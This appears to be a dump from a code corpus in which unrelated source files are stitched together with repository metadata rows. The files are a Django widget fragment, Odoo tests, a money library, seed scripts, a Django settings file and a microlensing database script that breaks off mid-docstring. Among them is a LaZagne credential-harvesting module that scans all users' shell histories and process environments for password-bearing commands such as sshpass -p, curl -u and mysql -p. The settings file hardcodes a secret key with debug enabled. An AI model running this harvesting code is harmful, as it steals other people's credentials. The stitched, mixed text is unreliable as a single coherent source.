dir_naming = DirNaming(sobject=sobject, snapshot=virtual_snapshot)
dir_naming.set_protocol("sandbox")
dir_naming.set_naming(naming_expr)
base_dir = dir_naming.get_dir(alias=alias)
sandbox_div = DivWdg()
sandboxes_div.add(sandbox_div)
sandbox_div.add_class("spt_sandbox_option")
sandbox_div.add_attr("spt_sandbox_dir", base_dir)
if value == base_dir:
sandbox_div.add_color("background", "background3")
#sandbox_div.set_box_shadow()
sandbox_div.add_class("spt_selected")
else:
sandbox_div.add_style("opacity", "0.5")
sandbox_div.add_style("width: auto")
sandbox_div.add_style("height: 55px")
sandbox_div.add_style("padding: 5px")
#sandbox_div.add_style("float: left")
sandbox_div.add_style("margin: 15px")
sandbox_div.add_border()
if alias:
alias_div = DivWdg()
sandbox_div.add(alias_div)
alias_div.add(alias)
alias_div.add_style("font-size: 1.5em")
alias_div.add_style("font-weight: bold")
alias_div.add_style("margin-bottom: 15px")
icon_wdg = IconWdg("Folder", IconWdg.FOLDER)
sandbox_div.add(icon_wdg)
sandbox_div.add(base_dir)
return top
| epl-1.0 | 262,500,904,807,144,000 | 30.246154 | 81 | 0.541605 | false | 3.789179 | false | false | false |
AlessandroZ/LaZagne | Linux/lazagne/softwares/sysadmin/cli.py | 1 | 4072 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import psutil
import pwd
import os
from lazagne.config.module_info import ModuleInfo
from lazagne.config import homes
try:
from ConfigParser import ConfigParser # Python 2.7
except ImportError:
from configparser import ConfigParser # Python 3
class Cli(ModuleInfo):
def __init__(self):
ModuleInfo.__init__(self, 'cli', 'sysadmin')
def get_files(self):
known = set()
for user, histfile in homes.users(file=['.history', '.sh_history', '.bash_history', '.zhistory']):
yield user, histfile
known.add(histfile)
try:
for process in psutil.process_iter():
try:
environ = process.environ()
user = process.username()
except Exception:
continue
if 'HISTFILE' not in environ:
continue
histfile = environ['HISTFILE']
if histfile in ('/dev/zero', '/dev/null'):
continue
if histfile.startswith('~/'):
try:
home = pwd.getpwuid(process.uids().effective).pw_dir
except Exception:
continue
histfile = os.path.join(home, histfile[2:])
if os.path.isfile(histfile) and not histfile in known:
yield user, histfile
known.add(histfile)
except AttributeError:
# Fix AttributeError: 'module' object has no attribute 'process_iter'
pass
def get_lines(self):
known = set()
for user, plainfile in self.get_files():
try:
with open(plainfile) as infile:
for line in infile.readlines():
line = line.strip()
if line.startswith('#'):
continue
try:
int(line)
continue
except Exception:
pass
line = ' '.join(x for x in line.split() if x)
if line not in known:
yield user, line
known.add(line)
except Exception:
pass
for user, histfile in homes.users(file='.local/share/mc/history'):
parser = ConfigParser()
try:
parser.read(histfile)
except Exception:
continue
try:
for i in parser.options('cmdline'):
line = parser.get('cmdline', i)
if line not in known:
yield user, line
known.add(line)
except Exception:
pass
def suspicious(self, user, line):
markers = [
('sshpass', '-p'),
('chpasswd',),
('openssl', 'passwd'),
('sudo', '-S'),
('mysql', '-p'),
('psql', 'postgresql://'),
('pgcli', 'postgresql://'),
('ssh', '-i'),
('sqlplus', '/'),
('xfreerdp', '/p'),
('vncviewer', 'passwd'),
('vncviewer', 'PasswordFile'),
('mount.cifs', 'credentials'),
('pass=',),
('smbclient',),
('ftp', '@'),
('wget', '@'),
('curl', '@'),
('curl', '-u'),
('wget', '-password'),
('rdesktop', '-p'),
]
for marker in markers:
if all((x in line) for x in marker):
yield {
'User': user,
'Cmd': line
}
def run(self):
all_cmds = []
for user, line in self.get_lines():
for cmd in self.suspicious(user, line):
all_cmds.append(cmd)
return all_cmds
| lgpl-3.0 | -487,171,008,708,852,740 | 29.38806 | 106 | 0.4278 | false | 4.959805 | true | false | false |
suvitorg/suvit-odoo | suvit_base/tests/crud.py | 1 | 2195 | # -*- coding: utf-8 -*-
from lxml import etree
from odoo.tests.common import TransactionCase
from odoo.tools.safe_eval import safe_eval as eval
class CRUDCase(TransactionCase):
def crud(self, model, create_vals={}, write_vals={}, check_vals={}, view_id=None):
arch = model.fields_view_get(view_id=view_id, view_type='form', toolbar=True)
data = model.default_get(arch['fields'].keys())
self.assertTrue(arch['toolbar'])
obj = model.create(create_vals)
self.assertTrue(obj.exists())
obj = model.browse(obj.id)
self.assertTrue(obj)
data = obj.read(arch['fields'].keys())
arch = model.fields_view_get(view_type='tree')
data = obj.read(arch['fields'].keys())
obj.write(write_vals)
for k, v in write_vals.items():
if type(obj[k]) != type(v) and isinstance(v, int):
self.assertEqual(obj[k].id, v)
else:
self.assertEqual(obj[k], v)
for k, v in check_vals.items():
self.assertEqual(obj[k], v)
arch = model.fields_view_get(view_type='tree', toolbar=True)
self.assertTrue(arch['toolbar'])
arch = model.fields_view_get(view_type='search')
self.assertTrue(arch)
nodes = etree.XML(arch['arch']).xpath("/search/group/filter")
if not nodes:
nodes = etree.XML(arch['arch']).xpath("/search/filter")
groups = []
fields = []
for node in nodes:
node = eval(node.get('context'))
if 'group_by' not in node:
continue
node = node.get('group_by').decode('utf-8', 'ignore')
groups.append(node)
fields.append(node.split(":")[0])
fields = list(set(fields))
if groups:
field_names = self.env['ir.model.fields'].search([
('model', '=', model._name), ('name', 'in', fields)]).mapped('name')
self.assertEqual(len(fields), len(field_names))
res = model.read_group(domain=[], fields=fields, groupby=groups, lazy=True)
self.assertTrue(res)
obj.unlink()
self.assertFalse(obj.exists())
| agpl-3.0 | 5,289,709,077,205,224,000 | 33.296875 | 87 | 0.562187 | false | 3.752137 | false | false | false |
anler/Rockefeller | rockefeller/money.py | 1 | 5943 | # -*- coding: utf-8 -*-
from __future__ import division
import decimal
from collections import namedtuple
from six import PY3
from .exchange_rates import get_exchange_rate
from .exceptions import ExchangeError, MoneyError
def round_amount(amount, currency):
"""Round a given amount using curreny's exponent.
:param amount: :class:`~decimal.Decimal` number.
:param currency: :class:`~rockefeller.currency.Currency` object.
:return: Rounded amount as a :class:`~decimal.Decimal` number.
:raises: :class:`~rockefeller.exceptions.MoneyError` if an invalid currency
is supplied.
"""
try:
exponent = currency.exponent
except AttributeError:
raise MoneyError('Wrong currency `{!r}` for money.'.format(currency))
exponent = '1.' + '0' * currency.exponent
return amount.quantize(decimal.Decimal(exponent), rounding=decimal.ROUND_HALF_UP)
def to_decimal(value):
"""Convert a value into a decimal value.
:param value: Any value that can be casted into a numeric string.
:return: Decimal value. :class:`~decimal.Decimal` instance.
"""
if not isinstance(value, decimal.Decimal):
value = decimal.Decimal(str(value))
return value
def _check_operand(operation, operand):
if not isinstance(operand, Money):
msg = "unsupported operand type(s) for %s: 'Money' and '%r'" % (
operation, operand.__class__)
raise TypeError(msg)
class Money(namedtuple('Money', 'amount currency')):
"""Representation of money.
Every `Money` objects has an amount and a currency associated to it and the amount is always a
:class:`~decimal.Decimal` value.
Initialization params:
`amount`
Amount of money.
`currency`
Money currency. :class:`~rockefeller.currency.Currency` instance.
"""
indirection_currency = None
def __new__(cls, amount, currency):
return super(Money, cls).__new__(cls, to_decimal(amount), currency)
def __eq__(self, other):
return (isinstance(other, self.__class__) and
self.amount == other.amount and self.currency == other.currency)
def __add__(self, other):
_check_operand('+', other)
return Money(self.amount + other.amount, self.currency)
def __sub__(self, other):
_check_operand('-', other)
return Money(self.amount - other.amount, self.currency)
def __mul__(self, other):
_check_operand('*', other)
return Money(self.amount * other.amount, self.currency)
def __div__(self, other):
_check_operand('/', other)
return Money(self.amount / other.amount, self.currency)
__floordiv__ = __div__
__truediv__ = __div__
def __divmod__(self, other):
quotient, remainder = divmod(self.amount, other.amount)
return Money(quotient, self.currency), Money(remainder, self.currency)
def __float__(self):
return float(round_amount(self.amount, self.currency))
def __str__(self):
value = self.__unicode__()
if PY3:
return value
return value.encode('utf-8')
def __unicode__(self):
amount = self.amount
parts = str(amount).split('.')
if len(parts) == 2 and int(parts[1]) == 0:
amount = parts[0]
return u'{}{}'.format(self.currency.symbol, amount)
def remove(self, other):
result = self - other
if result.amount < 0:
result = Money(0, self.currency)
return result
def get_exchange_rate_to(self, currency, indirection_currency=None):
"""Get exchange rate of the currency of this money relatively to
``currency``.
:param currency: Output currency.
:class:`~rockefeller.currency.Currency` instance.
:param indirection_currency: Use this currency as the indirection
currency. :class:`~rockefeller.currency.Currency` instance.
:return: Exchange rate as a ``decimal`` if found, else ``None``.
"""
rate = get_exchange_rate(self.currency, currency)
if rate is None:
if not indirection_currency and Money.indirection_currency:
indirection_currency = Money.indirection_currency
rate_from_base = get_exchange_rate(self.currency, indirection_currency)
rate_base_to = get_exchange_rate(indirection_currency, currency)
if rate_from_base and rate_base_to:
rate = rate_from_base * rate_base_to
return rate
@property
def rounded_amount(self):
return round_amount(self.amount, self.currency)
def exchange_to(self, currency, indirection_currency=None,
exchange_rate=None):
"""Convert this money into money of another currency.
:param currency: Convert this money into this currency.
:class:`~rockefeller.currency.Currency` instance.
:param indirection_currency: Use this currency as the indirection
currency. :class:`~rockefeller.currency.Currency` instance.
:param exchange_rate: Use this exchange rate instead of trying to find
one.
:return: Money in ``currency`` currency.
:class:`~rockefeller.money.Money` instance.
:raises: :class:`~rockefeller.exceptions.ExchangeError`
if Exchange rate bettween currencies is not defined.
"""
if exchange_rate is None:
exchange_rate = self.get_exchange_rate_to(
currency, indirection_currency=indirection_currency)
else:
exchange_rate = to_decimal(exchange_rate)
if exchange_rate is None:
raise ExchangeError('Exchange rate {}-{} not defined.'.format(
self.currency, currency))
amount = round_amount(self.amount * exchange_rate, currency)
return self.__class__(amount=amount, currency=currency)
| mit | 7,846,369,725,114,093,000 | 33.754386 | 98 | 0.628639 | false | 4.135699 | false | false | false |
BunsenMcDubbs/cs4400-project | add_projects.py | 1 | 1707 | from random import randint, sample, choice
from app.models import Category, Designation, Project, Requirement
def add_projects(num_projects=20):
designations = [d['name'] for d in Designation.get_all()]
categories = [c['name'] for c in Category.get_all()]
year = [y['requirement_name'] for y in Requirement.get_all_year(include_none=True)]
major = [m['requirement_name'] for m in Requirement.get_all_major(include_none=True)]
department = [d['requirement_name'] for d in Requirement.get_all_department(include_none=True)]
for i in xrange(num_projects):
name = 'Project #{}'.format(i)
description = 'Description for {}'.format(name)
advisor_name = 'Advisor for {}'.format(name)
advisor_email = 'project{}[email protected]'.format(i)
est_num_students = randint(0, 1000)
designation = designations[randint(0, len(designations) - 1)]
cats = [categories[i] for i in sample(xrange(len(categories)), randint(2, 5))]
reqs = []
if choice([True, False]):
reqs.append(year[randint(0, len(year) - 1)])
if choice([True, False]):
reqs.append(major[randint(0, len(major) - 1)])
else:
reqs.append(major[randint(0, len(department) - 1)])
new_project = Project(
name=name,
description=description,
advisor_name=advisor_name,
advisor_email=advisor_email,
est_num_students=est_num_students,
designation_name=designation,
categories=cats,
requirements=reqs,
is_new_project=True
)
new_project.save()
if __name__=='__main__':
add_projects()
| mit | 3,880,460,114,864,280,000 | 40.634146 | 99 | 0.60867 | false | 3.718954 | false | false | false |
santumahapatra/django-poll-app | mysite/mysite/settings.py | 1 | 2040 | """
Django settings for mysite project.
For more information on this file, see
https://docs.djangoproject.com/en/1.6/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.6/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.6/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '=vo#pirs@)4p%&#nnek+gq0yr7f2la1f@a51*3u4=h4&py9fo_'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
TEMPLATE_DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'polls',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'mysite.urls'
WSGI_APPLICATION = 'mysite.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.6/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.6/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.6/howto/static-files/
STATIC_URL = '/static/'
TEMPLATE_DIRS = [os.path.join(BASE_DIR, 'templates')]
| mit | 1,138,400,909,693,369,500 | 23 | 71 | 0.719118 | false | 3.202512 | false | false | false |
ytsapras/robonet_site | scripts/OBSOLETE_CODE/update_db.py | 1 | 48917 | ################################################################################################################
# Collection of routines to update the RoboNet database tables
# Keywords match the class model fields in ../robonet_site/events/models.py
#
# Written by Yiannis Tsapras Sep 2015
# Last update:
################################################################################################################
# Import dependencies
import os
import sys
from local_conf import get_conf
robonet_site = get_conf('robonet_site')
sys.path.append(robonet_site)
#os.environ['DJANGO_SETTINGS_MODULE'] = 'robonet_site.settings'
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'robonet_site.settings')
from django.core import management
from django.conf import settings
from django.utils import timezone
from django import setup
setup()
#from events.models import Event, Single_Model, Binary_Model, Data_File, Robonet_Log, Robonet_Reduction, Robonet_Request, Robonet_Status, Ogle_Detail, Moa_Detail, Kmt_Detail
from events.models import Operator, Telescope, Instrument, Filter, Event, Event_Name
################################################################################################################
def add_operator(operator_name):
"""
Adds a new operator name in the database.
This can be the survey name or the name of the follow-up group.
Keyword arguments:
operator_name -- The operator name (string, required)
"""
new_operator = Operator.objects.get_or_create(name=operator_name)
if new_operator[-1] == False:
successful = False
else:
successful = True
return successful
################################################################################################################
def add_telescope(operator, telescope_name, aperture=0.0, latitude=0.0, longitude=0.0, altitude=0.0, site=""):
"""
Adds a new telescope name in the database.
Keyword arguments:
operator -- The operator (object, required) -- ForeignKey object
telescope_name -- The telescope name (string, required)
aperture -- The telescope aperture (float, optional, default=0.0)
latitude -- The telescope latitude (N) in decimal degrees (float, optional, default=0.0)
longitude -- The telescope longitude (E) in decimal degrees (float, optional, default=0.0)
altitude -- The telescope altitude in meters (float, optional, default=0.0)
site -- The site name (string, optional, default="")
"""
known_telescope = Telescope.objects.filter(name=telescope_name).exists()
# If the telescope already exists there's no need to add it
if known_telescope == True:
successful = False
else:
add_new = Telescope(operator=operator, name=telescope_name, aperture=aperture, latitude=latitude,
longitude=longitude, altitude=altitude,site=site)
add_new.save()
successful = True
return successful
################################################################################################################
def add_instrument(telescope, instrument_name, pixscale=0.0):
"""
Adds a new instrument name in the database. A single instrument can appear multiple
times in this list as it can be moved to different telescopes.
Keyword arguments:
telescope -- The telescope (object, required) -- ForeignKey object
instrument_name -- The instrument name (string, required)
pixscale -- The pixel scale of the CCD (arcsec/pix)
"""
try:
add_new = Instrument(telescope=telescope, name=instrument_name, pixscale=pixscale)
add_new.save()
successful = True
except:
successful = False
return successful
################################################################################################################
def add_filter(instrument, filter_name):
"""
Adds a new filter name in the database. A single filter can appear multiple
times in this list as it can exist for different instruments.
Keyword arguments:
instrument -- The instrument (object, required) -- ForeignKey object
filter_name -- The filter name (string, required)
"""
try:
add_new = Filter(instrument=instrument, name=filter_name)
add_new.save()
successful = True
except:
successful = False
return successful
################################################################################################################
def check_exists(event_name):
"""
Check if event exists in database.
Keyword arguments:
event_name -- The event name (string, required)
"""
if event_name.startswith("OGLE"):
successful = Event.objects.filter(ev_name_ogle=event_name).exists()
elif event_name.startswith("MOA"):
successful = Event.objects.filter(ev_name_moa=event_name).exists()
elif event_name.startswith("KMT"):
successful = Event.objects.filter(ev_name_kmt=event_name).exists()
else:
successful = False
return successful
################################################################################################################
def check_coords(event_name, check_ra, check_dec):
"""
Cross-survey identification check.
Check if an event at these coordinates already exists in the database.
Keyword arguments:
event_name -- The event name (string, required)
check_ra -- event RA. (string, required)
e.g. "17:54:33.58"
check_dec -- event DEC. (string, required)
e.g. "-30:31:02.02"
"""
################################################################################################################
def add_new_event(event_name, event_ra, event_dec, bright_neighbour = False):
"""
Add a new event to the database.
Keyword arguments:
ev_name_ogle -- OGLE name of event. (string, optional, default='...')
e.g. "OGLE-2015-BLG-1234"
ev_name_moa -- MOA name of event. (string, optional, default='...')
e.g. "MOA-2015-BLG-123"
ev_name_kmt -- KMT name of event. (string, optional, default='...')
e.g. "KMT-2015-BLG-1234"
ev_ra -- event RA. (string, required)
e.g. "17:54:33.58"
ev_dec -- event DEC. (string, required)
e.g. "-30:31:02.02"
bright_neighbour -- Is there a bright neighbour? (boolean, optional,
default=False)
"""
# Check if the event already exists in the database. If not, add it.
if event_name.startswith("OGLE") and check_exists(event_name)==False:
ev = Event(ev_name_ogle=event_name, ev_ra=event_ra, ev_dec=event_dec,
bright_neighbour = bright_neighbour)
ev.save()
successful = True
elif event_name.startswith("MOA") and check_exists(event_name)==False:
ev = Event(ev_name_moa=event_name, ev_ra=event_ra, ev_dec=event_dec,
bright_neighbour = bright_neighbour)
ev.save()
successful = True
elif event_name.startswith("KMT") and check_exists(event_name)==False:
ev = Event(ev_name_kmt=event_name, ev_ra=event_ra, ev_dec=event_dec,
bright_neighbour = bright_neighbour)
ev.save()
successful = True
else:
successful = False
return successful
def update_data(event_name, datafile, last_upd, last_mag, tel, ver, ndat):
"""
Add or Update a data file to the database.
Uses the .dat files rsynced from ARTEMiS.
Keyword arguments:
event_name -- The event name (string, required)
datafile -- Full path to the data file (string, required)
last_upd -- datetime of last update. (datetime, required,
default=timezone.now())
last_mag -- last recorded magnitude (float, required)
tel -- telescope identifier (string, required)
ver -- reduction version identifier (integer, required)
ndat -- number of data points (integer, required)
"""
# Check if the event already exists in the database.
if event_name.startswith("OGLE") and check_exists(event_name)==True:
# Get event identifier.
ev = Event.objects.get(ev_name_ogle=event_name)
ev.data_file_set.update_or_create(datafile=datafile,
last_updated=last_upd,
last_magnitude=last_mag,
telescope=tel,
version=ver,
ndata=ndat)
ev.save()
successful = True
elif event_name.startswith("MOA") and check_exists(event_name)==True:
# Get event identifier.
ev = Event.objects.get(ev_name_moa=event_name)
ev.data_file_set.update_or_create(datafile=datafile,
last_updated=last_upd,
last_magnitude=last_mag,
telescope=tel,
version=ver,
ndata=ndat)
ev.save()
successful = True
elif event_name.startswith("KMT") and check_exists(event_name)==True:
# Get event identifier.
ev = Event.objects.get(ev_name_kmt=event_name)
ev.data_file_set.update_or_create(datafile=datafile,
last_updated=last_upd,
last_magnitude=last_mag,
telescope=tel,
version=ver,
ndata=ndat)
ev.save()
successful = True
else:
successful = False
return successful
################################################################################################################
def ogle_details(event_name, Tmax, tau, umin,
url_link, last_updated=timezone.now()):
"""
Update or Add OGLE event details to the database. These are the survey event
parameters as displayed on the survey website.
Keyword arguments:
event_name -- OGLE name of event. (string, required)
e.g. "OGLE-2015-BLG-1234"
Tmax -- time of maximum magnification.(float, required)
e.g. 2457135.422
tau -- event timescale (in days). (float, required)
umin -- minimum impact parameter (in units of R_E). (float, required)
last_updated -- datetime of last update. (datetime, required,
default=timezone.now())
e.g. datetime(2015, 9, 23, 15, 26, 13, 104683, tzinfo=<UTC>)
url_link -- URL link to OGLE survey event page (string, required)
"""
# Check if the event already exists in the database.
if check_exists(event_name)==True:
# Get event identifier
ev = Event.objects.get(ev_name_ogle=event_name)
ev.ogle_detail_set.update_or_create(Tmax=Tmax, tau=tau, umin=umin,
last_updated=last_updated, url_link=url_link)
ev.save()
successful = True
else:
successful = False
return successful
################################################################################################################
def moa_details(event_name, Tmax, tau, umin,
url_link, last_updated=timezone.now()):
"""
Update or Add MOA event details to the database. These are the survey event
parameters as displayed on the survey website.
Keyword arguments:
event_name -- MOA name of event. (string, required)
e.g. "MOA-2015-BLG-123"
Tmax -- time of maximum magnification.(float, required)
e.g. 2457135.422
tau -- event timescale (in days). (float, required)
umin -- minimum impact parameter (in units of R_E). (float, required)
last_updated -- datetime of last update. (datetime, required,
default=timezone.now())
e.g. datetime(2015, 9, 23, 15, 26, 13, 104683, tzinfo=<UTC>)
url_link -- URL link to MOA survey event page (string, required)
"""
# Check if the event already exists in the database.
if check_exists(event_name)==True:
# Get event identifier
ev = Event.objects.get(ev_name_moa=event_name)
ev.moa_detail_set.update_or_create(Tmax=Tmax, tau=tau, umin=umin,
last_updated=last_updated, url_link=url_link)
ev.save()
successful = True
else:
successful = False
return successful
################################################################################################################
def kmt_details(event_name, Tmax, tau, umin,
url_link, last_updated=timezone.now()):
"""
Update or Add KMT event details to the database. These are the survey event
parameters as displayed on the survey website.
Keyword arguments:
event_name -- KMT name of event. (string, required)
e.g. "KMT-2015-BLG-1234"
Tmax -- time of maximum magnification.(float, required)
e.g. 2457135.422
tau -- event timescale (in days). (float, required)
umin -- minimum impact parameter (in units of R_E). (float, required)
last_updated -- datetime of last update. (datetime, required,
default=timezone.now())
e.g. datetime(2015, 9, 23, 15, 26, 13, 104683, tzinfo=<UTC>)
url_link -- URL link to KMT survey event page (string, required)
"""
# Check if the event already exists in the database.
if check_exists(event_name)==True:
# Get event identifier
ev = Event.objects.get(ev_name_kmt=event_name)
ev.kmt_detail_set.update_or_create(Tmax=Tmax, tau=tau, umin=umin,
last_updated=last_updated, url_link=url_link)
ev.save()
successful = True
else:
successful = False
return successful
################################################################################################################
def single_lens_par(event_name, Tmax, e_Tmax, tau, e_tau, umin, e_umin, last_updated):
"""
Update or Add Single Lens model parameters as estimated by ARTEMiS
to the database.
Keyword arguments:
event_name -- KMT name of event. (string, required)
e.g. "KMT-2015-BLG-1234"
Tmax -- time of maximum magnification.(float, required)
e.g. 2457135.422
e_Tmax -- error in Tmax (float, required)
tau -- event timescale (in days). (float, required)
e_tau -- error in tau (float, required)
umin -- minimum impact parameter (in units of R_E). (float, required)
e_umin -- error in umin (float, required)
last_updated -- datetime of last update. (datetime, required)
e.g. datetime(2015, 9, 23, 15, 26, 13, 104683, tzinfo=<UTC>)
"""
# Check if the event already exists in the database.
if event_name.startswith("OGLE") and check_exists(event_name)==True:
# Get event identifier
ev = Event.objects.get(ev_name_ogle=event_name)
ev.single_model_set.update_or_create(Tmax=Tmax, e_Tmax=e_Tmax, tau=tau,
e_tau=e_tau, umin=umin, e_umin=e_umin,
last_updated=last_updated)
ev.save()
successful = True
elif event_name.startswith("MOA") and check_exists(event_name)==True:
# Get event identifier
ev = Event.objects.get(ev_name_moa=event_name)
ev.single_model_set.update_or_create(Tmax=Tmax, e_Tmax=e_Tmax, tau=tau,
e_tau=e_tau, umin=umin, e_umin=e_umin,
last_updated=last_updated)
ev.save()
successful = True
elif event_name.startswith("KMT") and check_exists(event_name)==True:
# Get event identifier
ev = Event.objects.get(ev_name_kmt=event_name)
ev.single_model_set.update_or_create(Tmax=Tmax, e_Tmax=e_Tmax, tau=tau,
e_tau=e_tau, umin=umin, e_umin=e_umin,
last_updated=last_updated)
ev.save()
successful = True
else:
successful = False
return successful
################################################################################################################
def double_lens_par(event_name, Tmax, e_Tmax, tau, e_tau, umin, e_umin,
q, e_q, s, e_s, rho, alpha, last_updated):
"""
Update or Add Binary Lens model parameters as estimated by ARTEMiS
to the database.
Keyword arguments:
event_name -- KMT name of event. (string, required)
e.g. "KMT-2015-BLG-1234"
Tmax -- time of maximum magnification.(float, required)
e.g. 2457135.422
e_Tmax -- error in Tmax (float, required)
tau -- event timescale (in days). (float, required)
e_tau -- error in tau (float, required)
umin -- minimum impact parameter (in units of R_E). (float, required)
e_umin -- error in umin (float, required)
q -- mass ratio between the lensing components. (float, required)
e_q -- error in q (float, required)
s -- projected separation between the two lensing components
(in units of R_E). (float, required)
e_s -- error in s (float, required)
rho -- finite source size (in units of R_E). (float, required)
alpha -- trajectory angle w.r.t. binary axis (float, required)
last_updated -- datetime of last update. (datetime, required)
e.g. datetime(2015, 9, 23, 15, 26, 13, 104683, tzinfo=<UTC>)
"""
# Check if the event already exists in the database.
if event_name.startswith("OGLE") and check_exists(event_name)==True:
# Get event identifier
ev = Event.objects.get(ev_name_ogle=event_name)
ev.binary_model_set.update_or_create(Tmax=Tmax, e_Tmax=e_Tmax, tau=tau,
e_tau=e_tau, umin=umin, e_umin=e_umin, mass_ratio=q,
e_mass_ratio=e_q, separation=s, e_separation=e_s,
rho_finite=rho, angle_a = alpha,
last_updated=last_updated)
ev.save()
successful = True
elif event_name.startswith("MOA") and check_exists(event_name)==True:
# Get event identifier
ev = Event.objects.get(ev_name_moa=event_name)
ev.binary_model_set.update_or_create(Tmax=Tmax, e_Tmax=e_Tmax, tau=tau,
e_tau=e_tau, umin=umin, e_umin=e_umin, mass_ratio=q,
e_mass_ratio=e_q, separation=s, e_separation=e_s,
rho_finite=rho, angle_a = alpha,
last_updated=last_updated)
ev.save()
successful = True
elif event_name.startswith("KMT") and check_exists(event_name)==True:
# Get event identifier
ev = Event.objects.get(ev_name_kmt=event_name)
ev.binary_model_set.update_or_create(Tmax=Tmax, e_Tmax=e_Tmax, tau=tau,
e_tau=e_tau, umin=umin, e_umin=e_umin, mass_ratio=q,
e_mass_ratio=e_q, separation=s, e_separation=e_s,
rho_finite=rho, angle_a = alpha,
last_updated=last_updated)
ev.save()
successful = True
else:
successful = False
return successful
################################################################################################################
def update_log(event_name, image_name, timestamp, exptime,
filter1, filter2, filter3, telescope, instrument, group_id,
track_id, req_id, airmass, fwhm, sky_bg, sd_bg, moon_sep,
elongation, nstars, quality):
"""
Update Log with new image details in the database.
Keyword arguments:
event_name -- The event name. (string, required)
e.g. "OGLE-2015-BLG-1234"
image_name -- The image name. (string, required)
e.g. lsc1m005-kb78-20150922-0089-e10.fits
timestamp -- Time of observation. (datetime, required)
e.g. datetime(2015, 9, 23, 15, 26, 13, 104683, tzinfo=<UTC>)
exptime -- Exposure time. (float, required)
filter1 -- Filter1 wheel identifier. (string, required)
filter2 -- Filter2 wheel identifier. (string, required)
filter3 -- Filter3 wheel identifier. (string, required)
telescope -- Telescope identifier. (string, required)
e.g. "1m0-05"
instrument -- Instrument identifier.(string, required)
e.g. "kb78"
group_id -- Group identifier. (string, required)
e.g. "RBN20150922T15.42112818"
track_id -- Track identifier. (string, required)
e.g. "0000110965"
req_id -- Request identifier. (string, required)
e.g. "0000427795"
airmass -- Airmass. (float, required)
fwhm -- average fwhm of stars. (in pixels) (float, required)
sky_bg -- sky background value. (in ADU) (float, required)
sd_bg -- error in sky_bg (float, required)
moon_sep -- angular distance of centre of moon from target. (float, required)
elongation -- estimated elongation of stars. (float, required)
nstars -- number of stars found in image. (integer, required)
quality -- image quality assessment. (string, required)
"""
if event_name.startswith("OGLE") and check_exists(event_name)==True:
# Get event identifier
ev = Event.objects.get(ev_name_ogle=event_name)
ev.robonet_log_set.update_or_create(event=event_name, image_name=image_name,
timestamp=timestamp, exptime=exptime, filter1=filter1,
filter2=filter2, filter3=filter3, telescope=telescope,
instrument=instrument, group_id=group_id, track_id=track_id,
req_id=req_id, airmass=airmass, fwhm=fwhm, sky_bg=sky_bg,
sd_bg=sd_bg, moon_sep=moon_sep, elongation=elongation,
nstars=nstars, quality=quality)
ev.save()
successful = True
elif event_name.startswith("MOA") and check_exists(event_name)==True:
ev = Event.objects.get(ev_name_moa=event_name)
ev.robonet_log_set.update_or_create(event=event_name, image_name=image_name,
timestamp=timestamp, exptime=exptime, filter1=filter1,
filter2=filter2, filter3=filter3, telescope=telescope,
instrument=instrument, group_id=group_id, track_id=track_id,
req_id=req_id, airmass=airmass, fwhm=fwhm, sky_bg=sky_bg,
sd_bg=sd_bg, moon_sep=moon_sep, elongation=elongation,
nstars=nstars, quality=quality)
ev.save()
successful = True
elif event_name.startswith("KMT") and check_exists(event_name)==True:
ev = Event.objects.get(ev_name_kmt=event_name)
ev.robonet_log_set.update_or_create(event=event_name, image_name=image_name,
timestamp=timestamp, exptime=exptime, filter1=filter1,
filter2=filter2, filter3=filter3, telescope=telescope,
instrument=instrument, group_id=group_id, track_id=track_id,
req_id=req_id, airmass=airmass, fwhm=fwhm, sky_bg=sky_bg,
sd_bg=sd_bg, moon_sep=moon_sep, elongation=elongation,
nstars=nstars, quality=quality)
ev.save()
successful = True
else:
successful = False
return successful
################################################################################################################
def update_reduction(event_name, lc_file, timestamp, version, ref_image, ron=0.0, gain=1.0,
oscanx1=1, oscanx2=50, oscany1=1, oscany2=500, imagex1=51, imagex2=1000,
imagey1=1, imagey2=1000, minval=1.0, maxval=55000.0, growsatx=0,
growsaty=0, coeff2=1.0e-06, coeff3=1.0e-12,
sigclip=4.5, sigfrac=0.5, flim=2.0, niter=4, use_reflist=0, max_nimages=1,
max_sky=5000.0, min_ell=0.8, trans_type='polynomial', trans_auto=0, replace_cr=0,
min_scale=0.99, max_scale=1.01,
fov=0.1, star_space=30, init_mthresh=1.0, smooth_pro=2, smooth_fwhm=3.0,
var_deg=1, det_thresh=2.0, psf_thresh=8.0, psf_size=8.0, psf_comp_dist=0.7,
psf_comp_flux=0.1, psf_corr_thresh=0.9, ker_rad=2.0, lres_ker_rad=2.0,
subframes_x=1, subframes_y=1, grow=0.0, ps_var=0, back_var=1, diffpro=0):
"""
Add or Update the lightcurve location and pipeline event reduction parameters
in the database. Also stores the reference frame name and DanDIA parameters
used to generate the lightcurve.
Keyword arguments:
event_name -- The event name. (string, required)
e.g. "OGLE-2015-BLG-1234"
lc_file -- The lightcurve file. (string, required)
timestamp -- The date the lightcurve file was created. (datetime, required)
